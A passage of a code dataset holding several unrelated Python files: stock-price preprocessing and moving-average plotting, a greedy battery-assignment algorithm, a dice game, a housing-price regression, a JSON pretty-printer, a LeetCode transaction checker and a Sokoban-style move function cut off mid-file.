metric_data = assign_null_into_data(arr=metric_data, length=len(stock['adjusted_close']))\n\n # append data and metrics column-wise\n stock = stack_data_and_metrics(stock, metric_data, metric_function_names)\n\n # normalize price values before applying labels\n # because we need to get rid of diversity among stocks\n stock = preprocessing.apply_normalization_to_raw_data(stock)\n\n return stock.iloc[-1]\n\n\ndef fast_get_last_image(train_stock_with_metrics, split_period=28):\n\n\n predictor_names = pd.read_csv(\"../sanity_new/clustered_names.csv\", header=None,\n squeeze=True).values.tolist()\n\n # drop nan values for proper set\n train_stock_with_metrics = train_stock_with_metrics.dropna()\n\n # drop irrelevant features\n stock_with_metrics = train_stock_with_metrics[['date'] + predictor_names]\n # when i do this, later i can reach data with stock name and date\n\n image_col_size = stock_with_metrics[predictor_names].shape[1]\n image_row_size = split_period\n\n if image_row_size != image_col_size:\n raise Exception(\"image matrix must be square!\")\n\n # lower = num_records - split_period\n # upper = lower + split_period\n\n image = stock_with_metrics[predictor_names].iloc[-split_period:]\n date = stock_with_metrics['date'].iloc[-split_period:]\n\n # normalization for image.\n image = (image - image.mean()) / image.std()\n image_flat = image.values.flatten() # image_flat'shape : image_row_size * image_col_size\n\n return date, image_flat\n\n\ndef normalize_and_calculate_metrics(stock_name, raw_data_path=\"../sanity_input/train/raw_data\", stock_with_metrics_path = \"../sanity_input/train/stock_with_metrics\"):\n 
\n # read stock csv\n stock = pd.read_csv(raw_data_path + \"/{}.csv\".format(stock_name))\n\n # read the stock_with_metrics csv\n stock_with_metrics = pd.read_csv(stock_with_metrics_path + \"/{}.csv\".format(stock_name))\n\n # get the last 100 records\n num_records = stock.shape[0]\n stock = stock.iloc[num_records - 100 : num_records]\n num_records = stock_with_metrics.shape[0]\n stock_with_metrics = stock_with_metrics.iloc[num_records - 100 : num_records]\n \n # create data arr to hold all metric info\n metric_data, metric_function_names = preprocessing.calculate_metrics(stock)\n \n # assign nan value beginning of the data\n metric_data = assign_null_into_data(arr=metric_data, length=len(stock['adjusted_close']))\n \n # append data and metrics column-wise\n stock = stack_data_and_metrics(stock, metric_data, metric_function_names)\n \n # normalize price values before applying labels\n # because we need to get rid of diversity among stocks\n stock = preprocessing.apply_normalization_to_raw_data(stock)\n\n # get only the fresh data\n fresh_stock_with_metrics = stock[stock.date.isin(stock_with_metrics.date) == False]\n \n return fresh_stock_with_metrics\n\ndef get_last_image(stock_name, split_period=28,\n stock_with_metrics_path=\"../sanity_input/train/stock_with_metrics\"):\n\n # read stock_with_metrics\n stock_with_metrics = pd.read_csv(stock_with_metrics_path + \"/{}.csv\".format(stock_name))\n\n # get the last 100 records\n # num_records = stock_with_metrics.shape[0]\n # stock_with_metrics = stock_with_metrics.iloc[num_records - 100 : num_records]\n\n predictor_names = pd.read_csv(\"../sanity_input/train/clustered_names.csv\", header=None, squeeze=True).values.tolist()\n\n # drop nan values for proper set\n stock_with_metrics = stock_with_metrics.dropna()\n\n # drop irrelevant features\n stock_with_metrics = stock_with_metrics[['date'] + predictor_names]\n # when i do this, later i can reach data with stock name and date\n \n\n \n image_col_size = stock_with_metrics[predictor_names].shape[1]\n image_row_size = split_period\n \n if image_row_size != image_col_size:\n raise Exception(\"image matrix must be square!\")\n\n # lower = num_records - split_period\n # upper = lower + split_period\n \n image = stock_with_metrics[predictor_names].iloc[-split_period:]\n date = stock_with_metrics['date'].iloc[-split_period:]\n\n # normalization for image.\n image = (image - image.mean()) / image.std()\n image_flat = image.values.flatten() # image_flat'shape : image_row_size * image_col_size\n \n return date, image_flat\n","sub_path":"src/old code base/obsolete code/src/sanity_preprocessing.py","file_name":"sanity_preprocessing.py","file_ext":"py","file_size_in_byte":7993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385371396","text":"from operator import itemgetter\n\n# find the distance between a house and a battery \ndef find_distance(house, battery):\n \n #derermine horizontal and vertical distance \n horizontal_distance = int(house.x_coordinate) - int(battery.x_coordinate)\n vertical_distance = int(house.y_coordinate) - int(battery.y_coordinate)\n \n # get only the absolute distance regardless of direction \n if horizontal_distance < 0:\n horizontal_distance *= -1\n \n if vertical_distance < 0:\n vertical_distance *= -1 \n\n # return total distance \n return horizontal_distance + vertical_distance\n\n# get the coordenates of a cable between a house and a battery \ndef create_cable(house, battery):\n # set coordinates to ints \n battery_c = 
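get_last_image and fast_get_last_image both reduce to the same three steps: slice the last split_period rows, z-score each column, flatten into one image vector. A compact stand-alone version; the column names and frame shape are illustrative only:

```python
# Minimal sketch of the windowing step: per-column z-score over the last
# split_period rows, then flatten row-major into a 1-D "image".
import numpy as np
import pandas as pd

def last_image(features: pd.DataFrame, split_period: int) -> np.ndarray:
    window = features.iloc[-split_period:]
    window = (window - window.mean()) / window.std()
    return window.values.flatten()

if __name__ == "__main__":
    df = pd.DataFrame(np.arange(12.0).reshape(6, 2), columns=["a", "b"])
    img = last_image(df, 3)
    print(img.shape)  # (6,) -> 3 rows x 2 columns flattened
```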
[int(battery.x_coordinate),int(battery.y_coordinate)]\n house_c = [int(house.x_coordinate),int(house.y_coordinate)]\n\n # first points where the cable goes through \n latest = house_c\n\n # determine which points in the grid the cable goes through \n if house_c[1] >= battery_c[1]:\n while latest[1] > battery_c[1]:\n house.cables.append(tuple(latest))\n latest[1] = latest[1]-1\n else:\n while latest[1] < battery_c[1]:\n house.cables.append(tuple(latest))\n latest[1] = latest[1]+1\n \n if house_c[0] >= battery_c[0]:\n while latest[0] > battery_c[0]:\n house.cables.append(tuple(latest))\n latest[0] = latest[0] - 1\n else:\n while latest[0] < battery_c[0]:\n house.cables.append(tuple(latest))\n latest[0] = latest[0] + 1\n \n # final destination of the cable\n house.cables.append(tuple(battery_c))\n\n\n# greedy algorithm that takes output and capacity into account\nclass restricted_greedy():\n def __init__(self, grid):\n pass\n\n def run(self, grid, district_number):\n all_batteries = list(grid.all_batteries.values())\n\n # Makes a list with each battery, max capacity and the current output\n capacities_and_outputs = []\n\n # Makes a list with houses and their outputs \n by_output= []\n\n for Battery in all_batteries:\n capacities_and_outputs.append([Battery,float(Battery.capacity),0])\n\n # Finds the closest house to connect \n for House in grid.all_houses.values():\n by_output.append([House, float(House.output)])\n \n\n # order houses by output for district 3\n if district_number == 3:\n by_output = sorted(by_output, key=itemgetter(1), reverse= True)\n\n for House in by_output:\n closest_distance = 100000000\n closest_battery = None\n\n # make sure the house is the closest and does not go over the max capacity \n for Battery in capacities_and_outputs:\n distance = find_distance(House[0], Battery[0])\n \n if distance < closest_distance and Battery[2] + House[1] < Battery[1]:\n closest_battery = Battery[0]\n closest_distance = distance\n \n # connect house to battery and update current output \n House[0].battery = closest_battery\n \n for i in capacities_and_outputs:\n if i[0] == closest_battery: i[2] = i[2] + House[1]\n \n for House in grid.all_houses.values():\n create_cable(House, House.battery) \n \n # return grid of connected houses and batteries \n return grid\n \n def calculate_cost(self, grid):\n\n # initial empty cost\n total_cost = 0\n\n # add cost of batteries\n total_cost += (5000 * len(grid.all_batteries.values()))\n\n # add cost of cables\n for House in grid.all_houses.values():\n total_cost += (len(House.cables) - 1) * 9\n \n # return total\n return total_cost ","sub_path":"code/algorithms/greedy.py","file_name":"greedy.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5480897","text":"# 5 dice Ivan and Maria\r\nfrom random import randint\r\n\r\nIVAN_DICE = 5\r\nMARIA_DICE = 5\r\n\r\nivan_score = 1001\r\nmaria_score = 1001\r\n\r\nwhile True:\r\n\r\n # 6 throws for Maria\r\n\r\n counter = 1\r\n dice_roll_sum = 0\r\n\r\n while counter <= 6:\r\n dice_roll = randint(1, 6)\r\n dice_roll_sum += dice_roll\r\n counter += 1\r\n\r\n if maria_score > 0:\r\n maria_score -= dice_roll_sum\r\n\r\n elif maria_score < 0:\r\n maria_score += dice_roll_sum\r\n\r\n print(\"Maria rolls: \" + str(dice_roll_sum) + \" and has a score of: \" + str(maria_score))\r\n\r\n if maria_score == 0:\r\n # Maria win\r\n break\r\n\r\n # 6 throws for Ivan\r\n counter = 1\r\n dice_roll_sum = 0\r\n\r\n while counter <= 
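find_distance above computes the Manhattan (taxicab) metric; abs() states the intent more directly than the sign-flipping branches. A sketch with hypothetical namedtuple stand-ins for the House and Battery objects:

```python
# Equivalent Manhattan distance in one expression. Point is a made-up
# stand-in exposing the same attribute names as the original classes.
from collections import namedtuple

Point = namedtuple("Point", ["x_coordinate", "y_coordinate"])

def find_distance(house, battery):
    return (abs(int(house.x_coordinate) - int(battery.x_coordinate))
            + abs(int(house.y_coordinate) - int(battery.y_coordinate)))

if __name__ == "__main__":
    print(find_distance(Point(3, 7), Point(1, 2)))  # 2 + 5 = 7
```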
6:\r\n dice_roll = randint(1, 6)\r\n dice_roll_sum += dice_roll\r\n\r\n counter += 1\r\n\r\n if ivan_score > 0:\r\n ivan_score -= dice_roll_sum\r\n\r\n elif ivan_score < 0:\r\n ivan_score += dice_roll_sum\r\n\r\n print(\"Ivan rolls: \" + str(dice_roll_sum) + \" and has a score of: \" + str(ivan_score))\r\n\r\n if ivan_score == 0:\r\n # Ivan win\r\n break\r\n\r\nif ivan_score == 0:\r\n print(\"Ivan wins!\")\r\nelif maria_score == 0:\r\n print(\"Maria wins!\")\r\n","sub_path":"Week 1/Task 28.py","file_name":"Task 28.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"216447750","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn import datasets, linear_model\nfrom sklearn.model_selection import cross_val_predict\n\nFEATURES = [\n \"CRIM\",\n \"ZN\",\n \"INDUS\",\n \"CHAS\",\n \"NOX\",\n \"RM\",\n \"AGE\",\n \"DIS\",\n \"RAD\",\n \"TAX\",\n \"PTRATIO\",\n \"B_RATIO\",\n \"LSTAT\",\n]\n\n\ndef mean_absolute_percentage_error(y_true, y_pred):\n return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\n\n\ndef run_model():\n # Data Engineer\n boston = datasets.load_boston()\n boston_df = pd.DataFrame(boston.data, columns=FEATURES)\n boston_df[\"LABELS\"] = boston.target\n\n boston_df = boston_df[boston_df[\"LABELS\"] < 50]\n\n # Data Scientist\n lr = linear_model.LinearRegression()\n predicted = cross_val_predict(lr, boston_df[FEATURES], boston_df[\"LABELS\"], cv=10)\n results = mean_absolute_percentage_error(boston_df[\"LABELS\"], predicted)\n return results\n\n\nif __name__ == \"__main__\":\n results = run_model()\n print(\"Your MAPE Score is: {:.2f}%\".format(results))\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"322586061","text":"from termcolor import colored\nfrom lib.visitors.JSONVisitor import JSONVisitor\n\n\nclass PrettyVisitor(JSONVisitor):\n TAB = 3 * ' '\n OBJTMPL = '{{\\n' + \\\n '{content}\\n' + \\\n '{tabs}}}'\n OBJITEMTMPL = '{tabs}\"{key}\": {val}'\n\n LISTTMPL = '[\\n' + \\\n '{content}\\n' + \\\n '{tabs}]'\n LISTITEMTMPL = '{tabs}{val}'\n\n CLISTTMPL = '[{content}]'\n CLISTITEMTMPL = '{val}'\n COBJTMPL = '{{{content}}}'\n COBJITEMTMPL = '\"{key}\":{val}'\n\n def __init__(self, compact=False, color=True):\n self.tabs = 0\n self.compact = compact\n if compact:\n self.list_template = self.CLISTTMPL\n self.list_item_tmpl = self.CLISTITEMTMPL\n self.obj_template = self.COBJTMPL\n self.obj_item_tmpl = self.COBJITEMTMPL\n else:\n self.list_template = self.LISTTMPL\n self.list_item_tmpl = self.LISTITEMTMPL\n self.obj_template = self.OBJTMPL\n self.obj_item_tmpl = self.OBJITEMTMPL\n\n if color:\n self.bool_color = lambda val: colored(val, 'yellow')\n self.int_color = lambda val: colored(val, 'red')\n self.str_color = lambda val: colored('\"{}\"'.format(val), 'cyan')\n self.null_color = lambda val: colored(val, 'blue')\n self.unkown_color = lambda val: colored(val, 'white')\n self.key_color = lambda key: colored(key, 'green')\n else:\n def plain_color(val): return val\n self.bool_color = plain_color\n self.int_color = plain_color\n self.str_color = lambda val: '\"{}\"'.format(val)\n self.null_color = plain_color\n self.unkown_color = plain_color\n self.key_color = plain_color\n\n def visit_node(self, node):\n self.tabs += 1\n res = node.accept(self)\n self.tabs -= 1\n return res\n\n def visit_base(self, 
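The MAPE metric in model.py is worth a spot check: it divides by y_true, so zero targets would blow up (the Boston prices kept above are all positive). Note also that datasets.load_boston was removed in scikit-learn 1.2, so the script as written only runs on older releases.

```python
# Spot check of mean_absolute_percentage_error as defined above.
import numpy as np

def mean_absolute_percentage_error(y_true, y_pred):
    return np.mean(np.abs((y_true - y_pred) / y_true)) * 100

y_true = np.array([100.0, 200.0])
y_pred = np.array([110.0, 180.0])
# each row is off by 10%, so MAPE is 10.0
print(round(mean_absolute_percentage_error(y_true, y_pred), 2))
```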
node):\n val = node.val\n if isinstance(val, bool):\n return self.bool_color(val)\n elif isinstance(val, int):\n return self.int_color(val)\n elif isinstance(val, str):\n return self.str_color(val)\n elif val is None:\n return self.null_color(val)\n else:\n return self.unkown_color(val)\n\n def visit_dict(self, node):\n if len(node.children.items()) == 0:\n return \"{}\"\n\n content = ''\n for i, item in enumerate(node.children.items()):\n key, val = item\n content += self.obj_item_tmpl.format(\n tabs=(self.tabs+1) * self.TAB,\n key=self.key_color(key),\n val=self.visit_node(val))\n if i != len(node.children) - 1:\n content += ','\n if not self.compact:\n content += '\\n'\n\n return self.obj_template.format(\n tabs=self.tabs * self.TAB,\n content=content)\n\n def visit_list(self, node):\n if len(node.children.items()) == 0:\n return \"[]\"\n\n content = ''\n for key, val in node.children.items():\n content += self.list_item_tmpl.format(\n tabs=(self.tabs+1) * self.TAB,\n val=self.visit_node(val))\n if key != len(node.children) - 1:\n content += ','\n if not self.compact:\n content += '\\n'\n\n return self.list_template.format(\n tabs=self.tabs * self.TAB,\n content=content)\n","sub_path":"lib/visitors/PrettyVisitor.py","file_name":"PrettyVisitor.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244439246","text":"import logging\n\nlg = logging.getLogger('schlang')\nlogging.basicConfig(format='%(asctime)s %(levelname)-8s %(threadName)-15s %(funcName)-15s %(message)s')\nlg.addHandler(logging.StreamHandler())\nlg.setLevel(0)\nauto_restart = False\ndefault_name = 'schlang'\n\nhas_zombies = True\nzombie_debug = False\nzombie_count = 10\nzombie_spawn_radius = 5000\nzombie_spawn_delay = 1\n\nfrom enum import Enum\nclass States(Enum):\n WAITING_START = 0\n STARTED = 1\n DEAD = 2\n","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499602322","text":"# -*- coding: utf-8\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\nimport pandas as pd\nimport jsm\nimport datetime\nimport matplotlib.finance as mpf\n\nfrom matplotlib.dates import date2num\n\n\n# 株価のデータ取得(銘柄コード, 開始日, 終了日)\ndef get_stock(code, start_date, end_date):\n\n # 期間設定\n\n year, month, day = start_date.split(\"-\")\n\n start = datetime.date(int(year), int(month), int(day))\n\n year, month, day = end_date.split(\"-\") \n\n end = datetime.date(int(year), int(month), int(day))\n\n # 株価データ取得\n\n q = jsm.Quotes()\n\n target = q.get_historical_prices(code, jsm.DAILY, start_date = start, end_date = end)\n\n # 項目ごとにリストに格納して返す\n\n date = [data.date for data in target]\n\n open = [data.open for data in target]\n\n close = [data.close for data in target]\n\n high = [data.high for data in target]\n\n low = [data.low for data in target]\n\n # 日付が古い順に並び替えて返す\n\n return [date[::-1], open[::-1], close[::-1], high[::-1], low[::-1]]\n\n\n\n\n# 移動平均線の計算(データ, 日数)\ndef move_average(data, day):\n return np.convolve(data, np.ones(day)/float(day), 'valid')\n \ndef main():\n args = sys.argv\n print( args)\n\n print( u'銘柄コード(第1引数):' + args[1])\n print( u'開始日  (第2引数):' + args[2])\n print( u'終了日  (第3引数):' + args[3])\n print( u'移動平均線(第4引数):' + args[4])\n print( u'移動平均線(第5引数):' + args[5])\n\n data1 = args[1]\n data2 = args[2]\n data3 = args[3]\n data4 = int(args[4])\n data5 = int(args[5])\n\n\n startDaystr = 
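PrettyVisitor relies on the node classes (built by JSONVisitor's tree, not shown in this record) calling back through accept(). A stripped-down illustration of that double dispatch, independent of the lib.visitors classes:

```python
# Minimal visitor double dispatch: the node's accept() routes control to the
# matching visit_* method on the visitor. Leaf/Printer are hypothetical.
class Leaf:
    def __init__(self, val):
        self.val = val

    def accept(self, visitor):
        return visitor.visit_base(self)

class Printer:
    def visit_base(self, node):
        return repr(node.val)

if __name__ == "__main__":
    print(Leaf("hi").accept(Printer()))  # 'hi'
```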
args[2]\n\n # 株価の取得(銘柄コード, 開始日, 終了日)\n code = args[1]\n today = datetime.date.today()\n print(today)\n todaystr = today.strftime('%Y-%m-%d')\n print(todaystr)\n\n #data_to_df1 = get_stock(code, '2017-1-1', todaystr)\n \n dataDF1 = \"data_to_df1.csv\"\n dataDF2 = \"data_to_df2.csv\"\n dataDF3 = \"data_to_df3.csv\"\n\n\n # データフレームの作成\n #df1 = pd.DataFrame({'始値':data_to_df1[1], '終値':data_to_df1[2], '高値':data_to_df1[3], '安値':data_to_df1[4]}, index = data_to_df1[0])\n #df1.to_csv(dataDF1)\n\n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\")\n\n #data_to_df2 = get_stock(code, '2016-1-1', '2016-12-31')\n\n # データフレームの作成\n #df2 = pd.DataFrame({'始値':data_to_df2[1], '終値':data_to_df2[2], '高値':data_to_df2[3], '安値':data_to_df2[4]}, index = data_to_df2[0])\n #df2.to_csv(dataDF2)\n\n\n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\")\n\n data_to_df3 = get_stock(code, startDaystr, todaystr)\n\n # データフレームの作成\n df3 = pd.DataFrame({'始値':data_to_df3[1], '終値':data_to_df3[2], '高値':data_to_df3[3], '安値':data_to_df3[4]}, index = data_to_df3[0])\n df3.to_csv(dataDF3)\n\n\n\n\n\n # CSVのロード(2015年と2016年のデータ)\n #data15 = np.genfromtxt(\"nikkei15.csv\", delimiter=\",\", skip_header=1, dtype='float')\n #data16 = np.genfromtxt(\"nikkei16.csv\", delimiter=\",\", skip_header=1, dtype='float')\n\n #data15 = np.genfromtxt(data2, delimiter=\",\", skip_header=1, dtype='float')\n #data16 = np.genfromtxt(data3, delimiter=\",\", skip_header=1, dtype='float')\n\n #data15 = np.genfromtxt(dataDF1, delimiter=\",\", skip_header=1, dtype='float')\n #data16 = np.genfromtxt(dataDF2, delimiter=\",\", skip_header=1, dtype='float')\n\n\n data15 = np.genfromtxt(dataDF3, delimiter=\",\", skip_header=1, dtype='float')\n\n # 5列目の終値だけを日付古い順に並び替えて取り出し\n #f15, f16 = data15[:,4], data16[:,4]\n #f15, f16 = f15[::-1], f16[::-1]\n \n f15 = data15[:,4]\n f15 = f15[::-1]\n\n # 移動平均線(25日線)の計算\n day = data4 # 日数\n #data = np.r_[f15[len(f15)-day+1:len(f15)], f16] # 2015年の終値の一部と2016年の終値を結合\n data = f15\n ma_25d = move_average(data, day)\n\n print(data)\n\n # 移動平均線(75日線)の計算\n day = data5 # 日数\n #data = np.r_[f15[len(f15)-day+1:len(f15)], f16] # 2015年の終値の一部と2016年の終値を結合\n data = f15\n ma_75d = move_average(data, day)\n \n\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n print(data)\n\n # グラフにプロット\n plt.plot(f15, label=\"f\")\n plt.plot(ma_25d, \"--\", color=\"r\", label=\"MA 10d\")\n plt.plot(ma_75d, \"--\", color=\"g\", label=\"MA 20d\") \n \n\n\n\n\n # グラフにプロット\n\n fig = plt.figure()\n\n ax = plt.subplot()\n\n mpf.candlestick2_ohlc(ax, df3['始値'], df3['高値'], df3['安値'], df3['終値'], width=0.5, colorup=\"g\", colordown=\"r\")\n\n\n ax.grid()\n\n ax.legend()\n\n fig.autofmt_xdate() #x軸のオートフォーマット\n\n\n\n\n\n\n\n\n\n\n # ラベル軸\n plt.title(data1)\n plt.xlabel(\"Day\")\n plt.ylabel(\"f\")\n # 凡例\n plt.legend(loc=\"4\")\n # グリッド\n plt.grid()\n\n\n # グラフ表示\n plt.show()\n\n \nif __name__ == \"__main__\":\n main()\n\n","sub_path":"aikt_moving_average.py","file_name":"aikt_moving_average.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11700700","text":"\"\"\"\nA transaction is possibly invalid if:\n the amount exceeds $1000, or;\n if it occurs within (and including) 60 minutes of another transaction with the same name in a different city.\n\nEach transaction string transactions[i] consists of comma separated values representing the name, time (in minutes), amount, and city of the transaction.\n\nGiven a list of transactions, return a list of transactions that are possibly 
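The convolution-based move_average is the core of the script above; with mode='valid' the result is day-1 samples shorter than the input, which is why the plotted averages start later than the price series:

```python
# Quick check of the moving average used above: len(out) == len(data) - day + 1.
import numpy as np

def move_average(data, day):
    return np.convolve(data, np.ones(day) / float(day), 'valid')

if __name__ == "__main__":
    prices = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
    print(move_average(prices, 3))  # ~[2. 3. 4.]
```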
invalid. You may return the answer in any order.\n\n\nExample 1:\n Input: transactions = [\"alice,20,800,mtv\",\"alice,50,100,beijing\"]\n Output: [\"alice,20,800,mtv\",\"alice,50,100,beijing\"]\n Explanation: The first transaction is invalid because the second transaction occurs within a difference of 60 minutes, have the same name and is in a different city. Similarly the second one is invalid too.\n\nExample 2:\n Input: transactions = [\"alice,20,800,mtv\",\"alice,50,1200,mtv\"]\n Output: [\"alice,50,1200,mtv\"]\n\nExample 3:\n Input: transactions = [\"alice,20,800,mtv\",\"bob,50,1200,mtv\"]\n Output: [\"bob,50,1200,mtv\"]\n\nConstraints:\n\ntransactions.length <= 1000\nEach transactions[i] takes the form \"{name},{time},{amount},{city}\"\nEach {name} and {city} consist of lowercase English letters, and have lengths between 1 and 10.\nEach {time} consist of digits, and represent an integer between 0 and 1000.\nEach {amount} consist of digits, and represent an integer between 0 and 2000\n\"\"\"\n\ndef invalidTransactions(transactions):\n transactions_list = list()\n invalid_transactions = list()\n for t in transactions:\n if len(t) > 1000:\n invalid_transactions.append(t)\n continue\n t_list = t.split(\",\")\n transactions_list.append(t_list)\n try:\n int(t_list[1])\n if int(t_list[1]) < 0 or int(t_list[1]) > 1000:\n invalid_transactions.append(t)\n continue\n except ValueError:\n invalid_transactions.append(t)\n continue\n try:\n int(t_list[2])\n if int(t_list[2]) < 0 or int(t_list[2]) > 1000:\n invalid_transactions.append(t)\n continue\n except ValueError:\n invalid_transactions.append(t)\n continue\n try:\n int(t_list[0])\n invalid_transactions.append(t)\n continue\n except ValueError:\n if not t_list[0].islower() or len(t_list[0]) < 1 or len(t_list[0]) > 10:\n invalid_transactions.append(t)\n continue\n try:\n int(t_list[3])\n invalid_transactions.append(t)\n continue\n except ValueError:\n if not t_list[3].islower() or len(t_list[3]) < 1 or len(t_list[3]) > 10:\n invalid_transactions.append(t)\n continue\n data = dict()\n for t in transactions_list:\n if t[0] in data:\n for i in range(0, len(data[t[0]]['city'])):\n if t[3] != data[t[0]]['city'][i] and abs(int(data[t[0]]['time'][i]) - int(t[1])) <= 60:\n if ','.join(t) not in invalid_transactions:\n invalid_transactions.append(','.join(t))\n old_transaction = ','.join([t[0], data[t[0]]['time'][i], data[t[0]]['amount'][i], data[t[0]]['city'][i]])\n if old_transaction not in invalid_transactions:\n invalid_transactions.append(old_transaction)\n data[t[0]]['time'].append(t[1])\n data[t[0]]['amount'].append(t[2])\n data[t[0]]['city'].append(t[3])\n else:\n data[t[0]] = {'time': [t[1]],'amount':[t[2]], 'city': [t[3]]}\n return invalid_transactions\n\n\ntransactions1 = [\"alice,20,800,mtv\",\"alice,50,100,beijing\"]\ntransactions2 = [\"alice,20,800,mtv\",\"alice,50,1200,mtv\"]\ntransactions3 = [\"alice,20,800,mtv\",\"bob,50,1200,mtv\"]\ntransactions4 = [\"bob,689,1910,barcelona\",\"alex,696,122,bangkok\",\"bob,832,1726,barcelona\",\"bob,820,596,bangkok\",\"chalicefy,217,669,barcelona\",\"bob,175,221,amsterdam\"]\n\ntransactions5 = [\"bob,627,1973,amsterdam\",\"alex,387,885,bangkok\",\"alex,355,1029,barcelona\",\"alex,587,402,bangkok\",\"chalicefy,973,830,barcelona\",\"alex,932,86,bangkok\",\"bob,188,989,amsterdam\"]\ntransactions6 = 
[\"xnova,261,1949,chicago\",\"bob,206,1284,chicago\",\"xnova,420,996,bangkok\",\"chalicefy,704,1269,chicago\",\"iris,124,329,bangkok\",\"xnova,791,700,amsterdam\",\"chalicefy,572,697,budapest\",\"chalicefy,231,310,chicago\",\"chalicefy,763,857,chicago\",\"maybe,837,198,amsterdam\",\"lee,99,940,bangkok\",\"bob,132,1219,barcelona\",\"lee,69,857,barcelona\",\"lee,607,275,budapest\",\"chalicefy,709,1171,amsterdam\"]\n\nprint(invalidTransactions(transactions6))\n\n\n\n","sub_path":"LeetCode-Python/1169 Invalid Transactions.py","file_name":"1169 Invalid Transactions.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56615778","text":"# --*-- coding:utf-8 --*--\r\nimport configparser\r\nimport os\r\n\r\n\r\nclass NewConfigParser(configparser.ConfigParser):\r\n # 原方法会将option全部置为小写,改写后会按照原文输出\r\n def optionxform(self, optionstr):\r\n return optionstr\r\n\r\n\r\nclass Common(object):\r\n\r\n array = [['*' for i in range(10)] for j in range(10)]\r\n\r\n @staticmethod\r\n def check_dict(set_data):\r\n \"\"\"arr for 背景\r\n o for 目标 [x][y]\r\n p for 推->箱子 [x][y]\r\n q for 墙 [x][y]\r\n r for 人 [x][y]\"\"\"\r\n if type(set_data) != dict:\r\n print('没有可以用的字典。')\r\n return 'ng', \"ng\", \"ng\", \"ng\"\r\n arr = set_data['arr']\r\n if type(arr) != list:\r\n print(\"没有可以用的列表。\")\r\n return \"ng\", \"ng\", \"ng\", \"ng\"\r\n _r = set_data['r']\r\n _o = set_data['o']\r\n if type(_o[0]) != list:\r\n print(\"没有配置目标可以用的列表。\")\r\n return \"ng\", \"ng\", \"ng\", \"ng\"\r\n _p = set_data['p']\r\n if type(_p[0]) != list:\r\n print(\"没有配置箱子可以用的列表。\")\r\n return \"ng\", \"ng\", \"ng\", \"ng\"\r\n if len(_o) != len(_p):\r\n print(\"箱子数 {} 和目标数 {} 不一致。\".format(_p, _o))\r\n return \"ng\", \"ng\", \"ng\", \"ng\"\r\n\r\n return arr, _r, _p, _o\r\n\r\n @staticmethod\r\n def up(set_data):\r\n arr, _r, _p, _o = Common().check_dict(set_data)\r\n if arr == \"ng\":\r\n print(\"检查输入存在问题,需要重新配置游戏。\")\r\n set_data[\"result\"] = '检查输入存在问题,需要重新配置游戏。'\r\n return set_data\r\n if _r[0] == 0:\r\n print(\"无法向上了,已经到顶了。\")\r\n set_data[\"result\"] = '无法向上了,已经到顶了。'\r\n return set_data\r\n # 还要判断是不是有墙的问题\r\n else:\r\n # 如果人上有箱子\r\n if [int(_r[0]) - 1, _r[1]] in _p:\r\n index = _p.index([_r[0]-1, _r[1]])\r\n # 判断箱子上面有没有箱子\r\n if [_p[index][0]-1, _p[index][1]] in _p:\r\n print(\"没有那么大的力气,移不动两个箱子。\")\r\n set_data[\"result\"] = '没有那么大的力气,移不动两个箱子。'\r\n return set_data\r\n if _r[0] - 1 == _p[index][0] and _p[index][0] == 0 and _r[1] == _p[index][1]:\r\n print(\"不能推动箱子了,箱子已经到顶了。\")\r\n set_data[\"result\"] = '不能推动箱子了,箱子已经到顶了。'\r\n return set_data\r\n elif _r[0] - 1 == _p[index][0] and _p[index][0] != 0 and _r[1] == _p[index][1]:\r\n \"\"\"箱子在人的上面\"\"\"\r\n arr[_p[index][0] - 1][_p[index][1]] = 'P'\r\n arr[_r[0] - 1][_r[1]] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n if [_p[index][0] - 1, _p[index][1]] in _o:\r\n print(\"恭喜你,箱子到达目标。\")\r\n arr[_p[index][0] - 1][_p[index][1]] = 'OP'\r\n _r = [_r[0] - 1, _r[1]]\r\n _p[index] = [_p[index][0] - 1, _p[index][1]]\r\n else:\r\n \"\"\"人的上面没有东西,可以随意搬动\"\"\"\r\n arr[_r[0] - 1][_r[1]] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n _r = [_r[0] - 1, _r[1]]\r\n for oi in range(len(_o)):\r\n if arr[int(_o[oi][0])][int(_o[oi][1])] == \"*\":\r\n arr[int(_o[oi][0])][int(_o[oi][1])] = \"O\"\r\n op_flag = 0\r\n for op in range(len(_o)):\r\n if [_p[op][0], _p[op][1]] not in _o:\r\n op_flag = 1\r\n break\r\n return_data = {\"arr\": arr, \"o\": _o, \"p\": _p, \"r\": _r}\r\n if op_flag == 0:\r\n return_data['result'] = 'ok'\r\n else:\r\n 
